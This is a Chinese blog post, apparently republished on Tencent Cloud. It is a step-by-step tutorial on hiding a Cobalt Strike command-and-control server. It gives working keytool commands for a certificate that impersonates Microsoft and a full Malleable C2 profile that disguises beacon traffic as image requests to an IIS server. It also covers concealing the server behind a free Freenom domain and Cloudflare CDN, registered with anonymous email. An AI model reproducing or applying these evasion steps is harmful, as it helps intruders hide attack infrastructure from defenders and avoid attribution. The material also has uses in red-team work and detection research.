首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Cobalt Strike隐藏特征与混淆流量

Cobalt Strike隐藏特征与混淆流量

作者头像
kam1
发布2022-03-08 13:51:56
2.6K0
发布2022-03-08 13:51:56
举报

Cobalt Strike 特征隐藏与流量混淆

大致内容:

  • 修改默认端口
  • 服务器设置禁Ping
  • Cobalt Strike默认证书修改
  • CDN隐藏
  • 利用Malleable C2流量混淆

Cobalt Strike服务端配置

0x01. 需求配置

  • vps一台
  • 域名
  • CDN
  • Cobalt Strike4.0

0x02. 服务器设置禁ping

服务器禁ping从某种意义上来说,算是不存活的主机,但nmap是依然能够扫描出来的。 设置禁ping命令: vim /etc/sysctl.conf 打开后按i进入编辑模式,在任意位置新增以下内容 net.ipv4.icmp_echo_ignore_all=1

新增之后 ESC -> 冒号 -> wq[退出并保存] 再使用命令 sysctl -p 即可生效,这时候再ping主机就会ping不通了。

0x03. 修改Cobalt Strike默认端口号

在服务端的teamserver文件末尾处修改

修改之后再次启动teamserver的时候即可看到端口已经更改。

0x04. 修改默认证书

Cobalt Strike默认证书中含有与cs相关的特征,所以需要替换掉cs原有的证书,重新生成一个无特征的证书文件。 前提条件:服务器上已安装java 使用jdk自带的keytools这个java证书管理工具来生成新的无特征证书。

  • 首先删除cobalt strike原有的证书
  • 新建一个其他名字,只需要在teamserver最后一行修改 -Djavax.net.ssl.keyStore=./new.store 即可
  • 在Cobalt Strike当前目录生成一个无特征的证书
keytool -keystore 生成的store名 -storepass 密码 -keypass 密码 -genkey -keyalg RSA -alias 自定义别名 -dname "CN=Microsoft Windows, OU=MOPR, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US"

keytool -keystore new.store -storepass bypass -keypass bypass -genkey -keyalg RSA -alias apex.tk -dname "CN=Microsoft Windows, OU=MOPR, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US"
  • 修改证书标准并应用

keytool -importkeystore -srckeystore cobaltstrike.store -destkeystore cobaltstrike.store -deststoretype pkcs12

至此证书修改完成,使用命令: keytool -list -v -keystore cobaltstrike.store 可查看证书内容

可以看到签名是92EE36结尾,启动teamserver看看证书签名是否一致:

签名一致,确认证书修改成功.

0x05.混淆流量

接下来修改Beacon与cobalt strike通信时候的流量特征,创建一个.profile文件(名字任意),贴入以下从大佬那里偷过来的代码。

https-certificate {
    set keystore "new.store";	#证书名字
    set password "bypass";		#证书密码
}
#以上没有配置cloudflare的时候可以先不写

http-get {
    set uri "/image/";
    client {
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8";
        header "Referer" "http://www.google.com";
        header "Host" "apex1.tk";  #域名,还没有配置cloudflare的时候这一行注释掉
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";
        metadata {
            netbios;
            append ".jpg";  # 传输内容自动追加的后缀
            uri-append;
        }
    }

    server {
        header "Content-Type" "img/jpg";
        header "Server" "Microsoft-IIS/6.0";
        header "X-Powered-By" "ASP.NET";
        output {
            base64;  # 加密方式(base64、base64url、netbios、netbiosu)
            print;
        }
    }
}

http-post {
    set uri "/email/";
    client {
        header "Content-Type" "application/octet-stream";
        header "Referer" "http://www.google.com"; 
        header "Host" "apex1.tk";  #域名,还没有配置cloudflare的时候这一行注释掉
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";
        id {
            netbiosu;
            append ".png";
            uri-append;
        }
        output {
            base64;
            print;
        }
    }
    server {
        header "Content-Type" "img/jpg";
        header "Server" "Microsoft-IIS/6.0";
        header "X-Powered-By" "ASP.NET";
        output {
            base64;
            print;
        }
    }
}

保存之后赋予服务端的c2lint执行权限:chmod 777 c2lint

然后输入:./c2lint img.profile

输出如下图所示即为配置成功

使用CDN隐藏

0x01. 申请免费域名(白嫖是真香啊.)

白嫖域名连接:www.freenom.com 可以用来做博客域名、也可用来做其他用处 白嫖的可以不留过多信息,使用谷歌账号登录即可. 记得科学上网挂着,不然有可能申请不通过。

域名自己随便写一个喜欢的即可,检查可用性,然后点击selected,Checkout即可,1-12个月都是免费的

0x02. CDN配置(白嫖系列)

一时白嫖一时爽,一直白嫖一直爽,使用Cloudflare白嫖cdn. 有账号可以继续使用该账号进行添加站点,没有账号使用匿名邮箱注册一个即可.(推荐outlook、protonmail都可匿名)

1. 添加站点记录

这里添加站点,有时候会报错,google、baidu了很多方法都不管用,于是乎第二天就可以添加到了。

2. 添加DNS记录

根据自己喜欢随便整就行,解析记得写vps的地址,代理状态是默认开启,没有的话手动开启一下即可.

3. 修改DNS服务器

去freenom中删除dns名称服务器,添加为cloudflare的名称服务器

到freenom中修改dns服务器

4. 配置完成

以上操作完成之后回到cloudflare进行下一步 将https重写、始终使用https、Brotli都关闭并保存,之后点击检查名称服务器 点击检查之后过一会儿刷新一下页面,出现以下就代表成功了

一定要开启开发者模式!!! 缓存 -> 开发模式 开启

Cloudflare CDN支持的http端口:80,8080,8880,2052,2082,2086,2098 Cloudflare CDN支持的https端口:443,2053,2083,2087,2096,8443

5.HTTPS证书配置

首先配置配置SSL/TLS加密模式为完全,点击 源服务器 -> 创建证书,把密钥和证书复制保存下来,分别保存为pem.pem和key.key,然后上传到cobalt strike服务端

上传到服务端之后,使用keytool重新创建store证书:

首先执行openssl pkcs12 -export -in 证书名 -inkey 私钥名 -out p12名,如abc.p12 -name 域名 -passout pass:bypass

openssl pkcs12 -export -in pem.pem -inkey key.key -out apex.tk.p12 -name apex.tk -passout pass:bypass

其次执行keytool -importkeystore -deststorepass 密码 -destkeypass 密码 -destkeystore store名 -srckeystore p12名,如abc.p12 -srcstoretype PKCS12 -srcstorepass 密码 -alias 别名

keytool -importkeystore -deststorepass bypass -destkeypass bypass -destkeystore new.store -srckeystore apex.tk.p12 -srcstoretype PKCS12 -srcstorepass bypass -alias apex.tk

最后在profile配置文件中,取消注释头部的代码即可。

启动服务端的时候命令:./teamserver xx.xx.xx.xx password img.profile

6.测试上线

Listener按照下图配置,HTTPS同理

这里local port http就写80 https就写443

参考文档: https://www.jianshu.com/p/e7701efef047 https://www.cnblogs.com/Xy--1/p/14396744.html https://lengjibo.github.io/malleable/

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2021-08-09,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • Cobalt Strike 特征隐藏与流量混淆
  • Cobalt Strike服务端配置
    • 0x01. 需求配置
      • 0x02. 服务器设置禁ping
        • 0x03. 修改Cobalt Strike默认端口号
          • 0x04. 修改默认证书
            • 0x05.混淆流量
            • 使用CDN隐藏
              • 0x01. 申请免费域名(白嫖是真香啊.)
                • 0x02. CDN配置(白嫖系列)
                相关产品与服务
                访问管理
                访问管理(Cloud Access Management,CAM)可以帮助您安全、便捷地管理对腾讯云服务和资源的访问。您可以使用CAM创建子用户、用户组和角色,并通过策略控制其访问范围。CAM支持用户和角色SSO能力,您可以根据具体管理场景针对性设置企业内用户和腾讯云的互通能力。
                领券
                问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档